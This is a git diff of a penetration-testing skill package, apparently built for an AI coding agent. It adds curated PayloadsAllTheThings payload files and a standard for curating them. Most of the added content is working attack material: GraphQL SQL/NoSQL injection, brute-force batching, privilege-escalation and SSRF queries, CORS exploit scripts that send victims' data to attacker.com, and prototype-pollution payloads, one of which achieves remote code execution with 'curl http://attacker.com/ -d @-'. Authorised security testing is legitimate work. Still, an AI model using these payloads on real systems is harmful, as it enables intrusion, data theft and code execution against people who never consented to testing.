Integration Standard +> Governs all `payloads/` files and future PATT curation sessions. + +## File Format + +Every `payloads/` file MUST use this frontmatter: + +```markdown +--- +source: PayloadsAllTheThings +patt-path: +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/ +last-curated: YYYY-MM-DD +priority: critical|high|medium|low +--- + +# Payloads + +## Quick Hits + + +## Extended List + + +## Bypass Variants + + +## Notes + + +--- +*Full list: `patt-fetcher` agent → ""* +``` + +## P1/P2 Stub Format + +```markdown +--- +source: PayloadsAllTheThings +patt-path: +patt-url: +last-curated: TBD +priority: high|medium|low +--- + + +``` + +## Hard Rules + +- Every file **< 200 lines** — split into basic.md / bypass.md / etc. if needed +- `priority: critical` = curated this session; `high/medium/low` = future sessions +- `last-curated` date makes staleness visible at a glance +- Curated files always end with `*Full list: patt-fetcher*` pointer +- Inline additions to existing files tagged `` +- If a file hits 200 lines: split overflow into a new file immediately + +## Adding a New Category (Future Sessions) + +1. Find the PATT category in the URL Reference table in `docs/superpowers/plans/2026-03-13-patt-integration.md` +2. Create `attacks///payloads/.md` following the format above +3. Run `patt-fetcher` agent → curate top 10 quick hits + bypass variants +4. Validate: `wc -l .md` must show < 200 +5. Set `priority: critical` and `last-curated: YYYY-MM-DD` +6. Commit: `feat: add PATT payloads` diff --git a/projects/pentest/.claude/skills/pentest/SKILL.md b/plugins/pentest/skills/pentest/SKILL.md similarity index 94% rename from projects/pentest/.claude/skills/pentest/SKILL.md rename to plugins/pentest/skills/pentest/SKILL.md index ceb1612..0aecaa1 100644 --- a/projects/pentest/.claude/skills/pentest/SKILL.md +++ b/plugins/pentest/skills/pentest/SKILL.md @@ -146,3 +146,14 @@ outputs/{engagement-name}/ - **Test frameworks → processed/test-frameworks/**: SQL injection, command injection scripts - **Markdown reports → processed/intermediate-reports/**: pentest-final-report.md, executive-summary.md, etc. - **VERIFY CLEAN**: Before completing Phase 6, run `ls -la outputs/{engagement}/` - must show ONLY `report/` and `processed/` + +--- + +## Payload Reference + +Each attack category contains a `payloads/` subdirectory with curated PATT payloads (<200 lines/file). + +- **Browse**: `attacks///payloads/` +- **On-demand fetch**: `patt-fetcher` agent → `""` +- **Standard**: `PATT_STANDARD.md` — follow this for future curation sessions +- **P1/P2 stubs**: stub files with `priority: high/medium` — ready to fill next session diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-quickstart.md b/plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-quickstart.md rename to plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-resources.md b/plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/graphql/graphql-resources.md rename to plugins/pentest/skills/pentest/attacks/api-security/graphql/graphql-resources.md diff --git a/plugins/pentest/skills/pentest/attacks/api-security/graphql/payloads/injection.md b/plugins/pentest/skills/pentest/attacks/api-security/graphql/payloads/injection.md new file mode 100644 index 0000000..bc3f51f --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/api-security/graphql/payloads/injection.md @@ -0,0 +1,161 @@ +--- +source: PayloadsAllTheThings +patt-path: GraphQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/GraphQL%20Injection/README.md +last-curated: 2026-03-14 +priority: medium +--- + +# GraphQL — Injection & Attack Payloads + +## Quick Hits + +### Introspection Query (full schema dump) +```graphql +{ + __schema { + queryType { name } + mutationType { name } + types { + name + kind + fields { + name + type { name kind ofType { name kind } } + args { name type { name kind } } + } + } + } +} +``` + +### Introspection — Types Only (less noise) +```graphql +{ __schema { types { name } } } +``` + +### Field Suggestions (Clairvoyance / typo errors) +```graphql +# Misspell a field — server returns suggestions if enabled +{ user { passsword } } +# Error: Did you mean 'password'? +``` + +## Extended List + +### Batching Attack (Rate Limit / Brute Force Bypass) +```json +[ + {"query": "{ login(user:\"admin\", pass:\"password1\") { token } }"}, + {"query": "{ login(user:\"admin\", pass:\"password2\") { token } }"}, + {"query": "{ login(user:\"admin\", pass:\"password3\") { token } }"} +] +``` +> Send as JSON array — one HTTP request, N operations. Bypasses per-request rate limits. + +### Alias-Based Batching (same endpoint, no array needed) +```graphql +{ + a1: login(user:"admin", pass:"pass1") { token } + a2: login(user:"admin", pass:"pass2") { token } + a3: login(user:"admin", pass:"pass3") { token } +} +``` + +### IDOR via Direct Object Reference +```graphql +{ user(id: "2") { email phone creditCard } } +{ order(id: "00000000-0000-0000-0000-000000000001") { total items { name } } } +``` + +### Mutation — Privilege Escalation +```graphql +# Try to set own role to admin +mutation { + updateUser(id: "MYID", role: "admin") { id role } +} + +# Add self to admin group +mutation { + addUserToGroup(userId: "MYID", groupId: "admin") { success } +} +``` + +### SQL Injection via GraphQL Arguments +```graphql +# Test for SQLi in string arguments +{ user(name: "admin' OR '1'='1") { id email } } +{ user(name: "admin'--") { id email } } +{ product(search: "test' UNION SELECT username,password FROM users--") { name } } +``` + +### NoSQL Injection via GraphQL +```graphql +# MongoDB operator injection +{ user(id: {$gt: ""}) { email password } } +{ login(user: {$regex: ".*"}, pass: {$gt: ""}) { token } } +``` + +### GraphQL SSRF (via URL arguments) +```graphql +mutation { + fetchRemoteImage(url: "http://169.254.169.254/latest/meta-data/") { content } +} +query { + importData(source: "http://internal-service:8080/admin") { result } +} +``` + +### Denial of Service — Deep Nesting +```graphql +{ a { a { a { a { a { a { a { a { a { a { id } } } } } } } } } } } +``` + +### Disabled Introspection Bypass +```graphql +# Try __type instead of __schema +{ __type(name: "Query") { fields { name type { name } } } } + +# Field suggestion still works even with introspection disabled +{ user { passwrd } } # typo → suggestions leak field names + +# Tools: Clairvoyance (blind schema reconstruction) +# clairvoyance -u https://TARGET/graphql -o schema.json +``` + +### Authorization Bypass — Object-Level +```graphql +# Access other users' private data through nested resolvers +{ + me { + orders { # my orders + id + user { # pivot to other user via relationship + id email creditCard # may lack auth check here + } + } + } +} +``` + +## Bypass Variants + +| Restriction | Bypass | +|-------------|--------| +| Introspection disabled | `__type` query + Clairvoyance field-guessing tool | +| Rate limiting per request | Batched queries (array) or aliased queries (single request) | +| Auth required for mutations | Check query equivalents — some apps auth mutations but not queries | +| Query depth limiting | Widen rather than deepen (many sibling fields instead of nesting) | +| Input sanitisation (string) | Try numeric args; test array/object injection (`{$gt: ""}`) | + +## Notes + +- **Tools**: graphql-cop, Clairvoyance, InQL (Burp extension), Altair GraphQL Client, graphql-path-enum +- `graphql-cop -t https://TARGET/graphql` — automated security audit +- InQL Burp extension: generates introspection, auto-builds query templates +- Always test mutations separately — often less secured than queries +- Batching not always enabled — test by sending JSON array first +- Check `GET /graphql?query={__typename}` — some endpoints accept GET (no CSRF protection) + +--- +*Full list: `patt-fetcher` agent → "GraphQL Injection"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/rest-api/api-testing-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/api-security/rest-api/api-testing-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/rest-api/api-testing-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/api-security/rest-api/api-testing-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/rest-api/api-testing-comprehensive-guide.md b/plugins/pentest/skills/pentest/attacks/api-security/rest-api/api-testing-comprehensive-guide.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/rest-api/api-testing-comprehensive-guide.md rename to plugins/pentest/skills/pentest/attacks/api-security/rest-api/api-testing-comprehensive-guide.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-index.md b/plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-index.md rename to plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-quickstart.md b/plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-quickstart.md rename to plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-resources.md b/plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-resources.md rename to plugins/pentest/skills/pentest/attacks/api-security/web-llm/web-llm-attacks-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-index.md b/plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-index.md rename to plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-quickstart.md b/plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-quickstart.md rename to plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-resources.md b/plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/api-security/websockets/websockets-resources.md rename to plugins/pentest/skills/pentest/attacks/api-security/websockets/websockets-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-index.md b/plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-index.md rename to plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-quickstart.md b/plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-quickstart.md rename to plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-resources.md b/plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/auth-bypass/authentication-resources.md rename to plugins/pentest/skills/pentest/attacks/authentication/auth-bypass/authentication-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt-quickstart.md b/plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt-quickstart.md rename to plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt_attack_techniques.md b/plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt_attack_techniques.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt_attack_techniques.md rename to plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt_attack_techniques.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt_security_resources.md b/plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt_security_resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/jwt_security_resources.md rename to plugins/pentest/skills/pentest/attacks/authentication/jwt/jwt_security_resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/portswigger_jwt_labs.md b/plugins/pentest/skills/pentest/attacks/authentication/jwt/portswigger_jwt_labs.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/jwt/portswigger_jwt_labs.md rename to plugins/pentest/skills/pentest/attacks/authentication/jwt/portswigger_jwt_labs.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-index.md b/plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-index.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-index.md rename to plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-index.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-quickstart.md b/plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-quickstart.md rename to plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-resources.md b/plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/oauth/oauth-resources.md rename to plugins/pentest/skills/pentest/attacks/authentication/oauth/oauth-resources.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/authentication/password-attacks/password-attacks.md b/plugins/pentest/skills/pentest/attacks/authentication/password-attacks/password-attacks.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/authentication/password-attacks/password-attacks.md rename to plugins/pentest/skills/pentest/attacks/authentication/password-attacks/password-attacks.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/clickjacking/clickjacking-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/client-side/clickjacking/clickjacking-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/clickjacking/clickjacking-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/client-side/clickjacking/clickjacking-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/clickjacking/clickjacking-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/client-side/clickjacking/clickjacking-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/clickjacking/clickjacking-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/client-side/clickjacking/clickjacking-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/clickjacking/clickjacking-quickstart.md b/plugins/pentest/skills/pentest/attacks/client-side/clickjacking/clickjacking-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/clickjacking/clickjacking-quickstart.md rename to plugins/pentest/skills/pentest/attacks/client-side/clickjacking/clickjacking-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/client-side/cors/cors-cheat-sheet.md similarity index 94% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/client-side/cors/cors-cheat-sheet.md index 71fc39e..2789a13 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-cheat-sheet.md +++ b/plugins/pentest/skills/pentest/attacks/client-side/cors/cors-cheat-sheet.md @@ -427,6 +427,40 @@ python3 cors_scan.py -u https://victim.com -d -t 20 python3 cors_scan.py -i urls.txt -o results.json ``` + +### CorsOne + +Fast CORS discovery tool focused on speed over depth: +```bash +pip install corsone +corsone -u https://victim.com +corsone -u https://victim.com -H "Cookie: session=abc" +``` + +### of-cors (Internal Network Exploitation) + +Designed for CORS attacks against internal services that assume network = trust: +```bash +# Scan internal IP ranges via victim's browser (wildcard ACAO: *) +of-cors --target http://192.168.0.0/24 --external-host https://attacker.com +``` +Useful when `Access-Control-Allow-Origin: *` is set on internal services without credential requirement. + +### Preflight Cache Poisoning + +If `Access-Control-Max-Age` is set and responses vary by Origin without `Vary: Origin`: +1. Poison the OPTIONS preflight cache with a malicious origin +2. Subsequent preflight requests served from (poisoned) cache for all users +3. Bypasses CORS origin check for cached duration + +**Test for missing `Vary: Origin`:** +```bash +curl -H "Origin: https://evil.com" -I https://victim.com/api/endpoint | grep -i vary +# Vulnerable: no "Vary: Origin" header in response +``` + + + ### CorsMe ```bash diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/client-side/cors/cors-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/client-side/cors/cors-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-quickstart.md b/plugins/pentest/skills/pentest/attacks/client-side/cors/cors-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/cors/cors-quickstart.md rename to plugins/pentest/skills/pentest/attacks/client-side/cors/cors-quickstart.md diff --git a/plugins/pentest/skills/pentest/attacks/client-side/cors/payloads/misconfigs.md b/plugins/pentest/skills/pentest/attacks/client-side/cors/payloads/misconfigs.md new file mode 100644 index 0000000..cf7dc4c --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/client-side/cors/payloads/misconfigs.md @@ -0,0 +1,113 @@ +--- +source: PayloadsAllTheThings +patt-path: CORS Misconfiguration/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/CORS%20Misconfiguration/README.md +last-curated: 2026-03-14 +priority: high +--- + +# CORS — Misconfiguration Payloads + +## Quick Hits + +### Basic exploit payload (origin reflection + credentials) +```javascript +var xhr = new XMLHttpRequest(); +xhr.withCredentials = true; +xhr.open('GET', 'https://victim.example.com/api/userinfo', true); +xhr.onload = function() { + location = 'https://attacker.net/log?data=' + encodeURIComponent(this.responseText); +}; +xhr.send(); +``` + +### Null origin exploit (data: URI iframe) +```html + +``` + +### Fetch-based exfil +```javascript +fetch('https://victim.com/api/data', {credentials: 'include'}) + .then(r => r.text()) + .then(d => fetch('https://attacker.com/log?x=' + encodeURIComponent(d))); +``` + +## Extended List + +### Detection checklist (request headers to test) + +```http +Origin: https://attacker.com +Origin: null +Origin: https://victim.com.attacker.com +Origin: https://attackervictim.com +Origin: https://victim.attacker.com +Origin: https://victim.com%60.attacker.com +Origin: https://sub.victim.com +``` + +### Regex bypass patterns + +| Misconfiguration | Bypass Origin | +|---|---| +| `.*\.victim\.com` | `https://evil.victim.com` | +| `^victim\.com` | `https://victim.com.evil.com` | +| Unescaped `.` in regex | `https://victimXcom.evil.com` | +| Suffix match only | `https://evil.victim.com` | +| Prefix match only | `https://victim.com.evil.com` | + +### Response headers indicating vulnerability +```http +Access-Control-Allow-Origin: https://attacker.com +Access-Control-Allow-Credentials: true +``` + +### POST with CORS (JSON exfil) +```javascript +var xhr = new XMLHttpRequest(); +xhr.withCredentials = true; +xhr.open('POST', 'https://victim.com/api/action', true); +xhr.setRequestHeader('Content-Type', 'text/plain'); +xhr.onload = () => fetch('https://attacker.com/?d=' + encodeURIComponent(xhr.responseText)); +xhr.send('{"action":"export_data"}'); +``` + +### Internal network pivot (wildcard `*` no credentials) +```javascript +// Useful when server is internal and assumes network = trust +var xhr = new XMLHttpRequest(); +xhr.open('GET', 'http://192.168.1.1/admin', true); +xhr.onload = () => fetch('https://attacker.com/?d=' + encodeURIComponent(xhr.responseText)); +xhr.send(); +``` + +## Bypass Variants + +| Scenario | Technique | +|---|---| +| Origin whitelist regex | Inject subdomain prefix (`evil.trusted.com`) | +| Null whitelist | `data:` iframe or sandboxed iframe | +| XSS on trusted domain | Host payload on whitelisted domain | +| Pre-flight caching | Poison OPTIONS response cache | +| CORS + CSRF combo | No credentials needed if action is state-changing | + +## Notes + +- **Tools**: Corsy, CORScanner, CorsOne, of-cors +- Exploit requires: reflected Origin + `Access-Control-Allow-Credentials: true` +- `ACAO: *` alone can't be combined with credentials (browser blocks it) +- Always test with both GET and POST; some endpoints only allow one +- If XSS exists on a trusted origin, CORS restriction is fully bypassed +- Check for subdomain takeover on whitelisted subdomains → CORS pivot + +--- +*Full list: `patt-fetcher` agent → "CORS Misconfig"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/csrf/csrf-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/client-side/csrf/csrf-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/csrf/csrf-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/client-side/csrf/csrf-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/csrf/csrf-quickstart.md b/plugins/pentest/skills/pentest/attacks/client-side/csrf/csrf-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/csrf/csrf-quickstart.md rename to plugins/pentest/skills/pentest/attacks/client-side/csrf/csrf-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/dom-based/dom-based-vulnerabilities-complete.md b/plugins/pentest/skills/pentest/attacks/client-side/dom-based/dom-based-vulnerabilities-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/dom-based/dom-based-vulnerabilities-complete.md rename to plugins/pentest/skills/pentest/attacks/client-side/dom-based/dom-based-vulnerabilities-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/dom-based/dom-xss-quickstart.md b/plugins/pentest/skills/pentest/attacks/client-side/dom-based/dom-xss-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/dom-based/dom-xss-quickstart.md rename to plugins/pentest/skills/pentest/attacks/client-side/dom-based/dom-xss-quickstart.md diff --git a/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/payloads/basic.md new file mode 100644 index 0000000..ab47929 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/payloads/basic.md @@ -0,0 +1,102 @@ +--- +source: PayloadsAllTheThings +patt-path: Prototype Pollution/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Prototype%20Pollution/README.md +last-curated: 2026-03-14 +priority: high +--- + +# Prototype Pollution — Basic Payloads + +## Quick Hits + +### Client-Side (URL-based) +``` +https://victim.com/#__proto__[admin]=1 +https://victim.com/?__proto__[isAdmin]=true +https://victim.com/?a[constructor][prototype][onerror]=alert(1) +https://victim.com/?__proto__[src]=x&__proto__[onerror]=alert(1) +``` + +### Server-Side (JSON body) +```json +{"__proto__": {"isAdmin": true}} +{"__proto__": {"evilProperty": "evilPayload"}} +{"constructor": {"prototype": {"foo": "bar"}}} +``` + +### Express.js specific +```json +{"__proto__": {"parameterLimit": 1}} +{"__proto__": {"json spaces": " "}} +{"__proto__": {"status": 510}} +{"__proto__": {"exposedHeaders": ["foo"]}} +``` + +## Extended List + +### Property access variants +```javascript +__proto__.property = value +Object.__proto__.evilProperty = "payload" +Object.constructor.prototype.evilProperty = "payload" +Object.constructor["prototype"]["evilProperty"] = "payload" +x[__proto__][property] = value +``` + +### Query string variants +``` +?__proto__[test]=test +?__proto__.name=test +?__proto__[admin]=1&__proto__[role]=superadmin +?a[b][__proto__][admin]=1 +``` + +### RCE via EJS template engine (SSPP) +```json +{ + "__proto__": { + "client": 1, + "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | curl http://attacker.com/ -d @-')" + } +} +``` + +### RCE via Node.js env (SSPP) +```json +{ + "__proto__": { + "argv0": "node", + "shell": "node", + "NODE_OPTIONS": "--inspect=payload.oastify.com" + } +} +``` + +### Auth bypass via config pollution +```json +{"__proto__": {"isAdmin": true}} +{"__proto__": {"role": "admin"}} +{"__proto__": {"authorized": true}} +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| `hasOwnProperty` check | Use `constructor.prototype` instead of `__proto__` | +| Key sanitization `__proto__` | `constructor.prototype` or `__proto__` URL-encoded | +| JSON schema validation | Try nested: `{"a":{"__proto__":{"x":1}}}` | +| Object.freeze(Object.prototype) | Cannot bypass — target is protected | +| Recursive merge without guard | Any unguarded `merge(target, source)` | + +## Notes + +- **Tools:** pp-finder (gadget discovery), PPScan (CSPP scanner), Burp PortSwigger SSPP extension +- **Detection (SSPP):** Blind — look for `json spaces` adding whitespace to response, status code changes, CORS header changes +- Client-side: check URL fragments (#) and query params; search JS for `merge`, `extend`, `clone`, `defaults` +- SSPP via EJS is highest impact; Kibana CVE-2019-7609 is canonical RCE example +- PHP unaffected; only JavaScript (Node.js, browsers) + +--- +*Full list: `patt-fetcher` agent → "Prototype Pollution"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-cheat-sheet.md similarity index 95% rename from projects/pentest/.claude/skills/pentest/attacks/client-side/prototype-pollution/prototype-pollution-cheat-sheet.md rename to 